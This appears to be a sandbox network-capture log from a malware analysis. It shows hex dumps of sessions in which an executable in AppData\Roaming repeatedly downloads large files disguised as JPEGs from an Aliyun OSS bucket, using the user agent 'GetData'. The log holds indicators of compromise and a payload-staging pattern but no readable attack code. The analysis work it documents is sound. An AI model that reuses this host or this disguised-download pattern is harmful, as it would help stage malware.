2024-10-02 02:28:22 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2024-10-02 02:28:22 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2024-10-02 02:28:22 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49748	118.178.60.61	443	4452	C:\Users\user\AppData\Roaming\8AfroU.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:28:25 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 10mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:28:26 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:28:25 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 66FCAFC95C0069333423A2C9 Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 24 Sep 2024 05:37:11 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 1
2024-10-02 02:28:26 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 9c Data Ascii: ;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 f3 Data Ascii: xd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c a4 Data Ascii: ^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 d5 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 28 Data Ascii: M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|(
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 ab Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca 6b Data Ascii: 07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/k
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 44 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*D
2024-10-02 02:28:26 UTC	4096	IN	Data Raw: d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a e8 Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49749	118.178.60.61	443	4452	C:\Users\user\AppData\Roaming\8AfroU.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:28:36 UTC	115	OUT	GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 10mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:28:40 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:28:40 GMT Content-Type: image/jpeg Content-Length: 5016074 Connection: close x-oss-request-id: 66FCAFD8482D373233E74174 Accept-Ranges: bytes ETag: "2494A5FCE29E081FA6D4ADD00993178C" Last-Modified: Fri, 27 Sep 2024 07:07:41 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 387530017275970770 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: JJSl/OKeCB+m1K3QCZMXjA== x-oss-server-time: 2
2024-10-02 02:28:40 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: 82 16 ca f1 8d 38 4b 73 7f b5 26 05 0a 18 df 6f 5b ea 79 5e 06 25 40 d0 85 9c 93 28 dc dd 48 fe a2 b9 12 d7 cf 2d 5a db 79 44 ef 8f 85 0e 68 3d 5f d9 6a 52 ae b8 f7 ee 47 d7 bc a3 0a f5 ee b4 fd fa a2 b5 46 d8 5c 19 19 b2 16 89 39 dc d1 3f fd 9a fc 72 cc dd ad 96 93 a3 bb ad ae f0 34 51 a0 a3 13 d1 8a f1 d4 9e 78 03 47 cd 94 f6 71 8b 3b 53 98 4a dc f8 64 2b e7 42 37 7b 4b cf ed e0 23 ee d7 90 18 f1 55 74 ed c4 33 b2 7d f4 37 2d c1 d1 52 e0 1b 18 ea 89 59 e6 6e 1f 14 ed d8 da 8b f1 60 67 43 95 8a 6d dd 1f a2 97 52 40 6a 8f bc d8 2c 36 d1 11 a6 fc 8f 15 60 14 5f 81 75 e9 d6 22 52 42 d6 b9 6a b1 68 83 fe f9 36 33 bc c4 4b 54 2d 60 57 62 38 7a 74 2e 7c e3 3f 14 40 72 fa 5d d7 79 5a a8 f8 57 68 ac 6f d3 5e c0 4e af 57 14 ab 43 a4 5f b4 54 7f de f8 41 cd b7 fa Data Ascii: 8Ks&o[y^%@(H-ZyDh=_jRGF\9?r4QxGq;SJd+B7{K#Ut3}7-RYn`gCmR@j,6`_u"RBjh63KT-`Wb8zt.\|?@r]yZWho^NWC_TA
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: c7 ce 62 58 40 52 45 ad 03 8e cd c7 95 b6 2a 8b d8 a8 9a e0 94 ba fc ea ea 56 64 ef af bb 0e 69 a6 27 50 6f 67 d5 04 a3 9d 09 ae 33 36 38 7f c6 37 52 9a 3c a3 7e 64 e4 b8 1a ad bb 3f d2 4c 0e 8f ce 19 45 0f da 03 f3 3f 91 05 83 60 d9 ef ed 50 5c c1 15 ee 91 8a 3c eb 6e f5 c3 be 2e a6 7a 9b f3 02 ca c5 fd 01 3d 18 b5 73 15 81 7c 32 55 d4 1c ea 25 94 9f ab 21 e7 27 fc 9a ee ed 01 96 ca ac c6 cd 01 e2 9d ae e9 f0 3e e7 73 60 63 6e 69 05 ce 8e 9d 60 fd dc 1f f1 b4 de c2 0d de 8f ab 91 ec 66 83 cb 2c 78 de d0 46 ce 64 74 30 92 9f 82 51 38 46 58 d1 23 b7 bb 2c 97 5f 67 8f 25 a0 31 fc fc 47 ff 7e 8f 1c 58 a4 06 48 66 e7 d6 18 83 42 81 62 5f cd 57 3f 89 2e 91 65 96 43 f0 54 c7 02 7e ae b3 94 0c b2 83 ac 3a f2 38 a4 3a a4 6f 02 88 68 7e 9b 2a 6b c3 1a ee f5 ef a9 Data Ascii: bX@REVdi'Pog3687R<~d?LE?`P\<n.z=s\|2U%!'>s`cni`f,xFdt0Q8FX#,_g%1G~XHfBb_W?.eCT~:8:oh~k
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: 37 31 33 31 3f 31 33 31 37 31 33 31 4f 51 53 51 57 51 53 51 5f 51 53 51 57 51 53 51 4f 71 73 71 77 71 3b 75 49 71 73 71 77 71 2d 26 7b 51 53 51 57 51 d3 3b 64 51 53 51 57 51 6b e1 0d 31 33 31 37 31 8f cc 4c 31 33 31 37 31 35 31 cf 51 d3 d1 d7 d1 e9 02 e4 d1 d3 d1 d7 d1 f1 45 f2 f1 f3 f1 f7 f1 41 0e 89 f1 f3 f1 f7 f1 c5 05 bb d1 d3 d1 d7 d1 b5 68 e0 d1 bd 4b f8 d1 51 c2 e0 31 b1 75 7d 31 9d 51 04 31 b9 4e 42 31 33 31 4f 51 53 51 57 51 53 51 5f 51 53 51 57 51 53 51 4f 71 73 71 77 71 73 71 7f 71 73 71 77 71 73 71 4f 51 53 51 57 51 53 51 5f 51 53 51 57 51 53 51 4f 31 33 31 37 31 33 31 3f 31 33 31 37 31 33 31 cf d1 d3 d1 d7 d1 d3 d1 df d1 d3 d1 d7 d1 d3 d1 cf f1 f3 f1 f7 f1 f3 f1 ff f1 f3 f1 f7 f1 f3 f1 cf d1 d3 d1 d7 d1 d3 d1 df d1 d3 d1 d7 d1 d3 d1 cf 31 33 Data Ascii: 7131?1317131OQSQWQSQ_QSQWQSQOqsqwq;uIqsqwq-&{QSQWQ;dQSQWQk13171L1317151QEAhKQ1u}1Q1NB131OQSQWQSQ_QSQWQSQOqsqwqsqqsqwqsqOQSQWQSQ_QSQWQSQO1317131?131713113
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: 71 5c 56 61 09 3a ff 3c eb 9a d4 50 e2 60 af e3 03 8d d5 41 e2 d7 3a d8 06 f4 26 63 eb 61 8d a9 dc 31 ce 1c 5e 89 bc 92 86 bb 5f 1e d1 4d e0 04 d1 67 32 b2 eb 14 03 56 50 a8 20 d4 0d 1d be 5b 0e 70 32 a3 a5 bc 77 d9 bc 00 b5 85 92 0f 92 d0 45 47 10 24 ff 5d 84 a3 34 9d 79 29 c0 7d ef ba 4d 4c 80 48 69 5f 40 04 5c 8b 4e 22 9a fb 7e 6f 29 bc dd c8 c4 2a 62 53 02 6f 2d bc 52 35 8b 5c 04 f6 16 ba cb e6 55 fb 33 a3 96 b8 d4 e0 0e 42 15 82 59 9a 44 00 e2 3e 54 e2 9b 0c 4d 9c 39 f6 5d ae 5d 0e 2c 30 09 9b c2 4e 09 6a 34 4b ac 7c d4 b1 37 f5 32 88 67 c5 dc 57 e9 74 89 1c 0d bb a3 27 ec 08 ed f0 da 4f 4f 20 33 60 76 4d 99 f3 1c 82 86 81 9e 80 85 90 81 27 02 90 9c a0 1a fb 18 fd f3 20 77 9e 65 40 c6 e7 05 44 66 0c df 2a 95 b4 8e 5b cd 90 86 e0 3f de bd 88 26 ff b5 Data Ascii: q\Va:<P`A:&ca1^_Mg2VP [p2wEG$]4y)}MLHi_@\N"~o)bSo-R5\U3BYD>TM9]],0Nj4K\|72gWt'OO 3`vM' we@Df[?&
2024-10-02 02:28:40 UTC	4096	IN	Data Raw: b8 01 ad 4c f2 8c cc 52 7f 4c 54 86 0c 5a 74 a4 1d 3b 2e 48 2c e6 10 26 cd af f9 ba 47 d6 d7 92 2c 87 56 80 ac 89 66 87 ab 2c db 5a 41 86 1d 95 1c d6 c1 a3 a1 2c 1b ed a3 6c bc 01 3f e0 3b ae 7f 8d bb 47 2d 77 27 c6 6f 79 3c 86 a3 64 28 3f 23 3b da f2 8e 75 f4 20 ff 60 1b 26 c7 ee 7a ad af cf 97 d2 1d 56 c7 9c 0b 1b 10 cb 4f 52 28 c2 39 49 d6 22 4c 23 69 c7 4c 61 d8 54 6e cf 13 c6 99 c8 4c 5f 48 6b 81 74 be 7f 99 e1 82 a8 a2 bc 26 3c d0 30 47 bb 11 8a c1 55 58 c4 ae 37 dc 3f 29 d6 7d 14 d8 2f dd 19 11 bb 8f 89 bc 7a 54 c5 c7 a7 8f e2 3a 96 3a 3b af c1 8b 1b e6 44 bb cf 64 9d 7e 51 e4 1a 5f 17 bc 04 72 4a 64 e9 d5 7d 6f 6d 99 0c 24 b8 27 a8 f1 a3 97 7f a7 ab 5c be 7b 49 8e 48 b1 53 fd 98 6e 19 1c c6 ef dd 4c 4a d0 a6 09 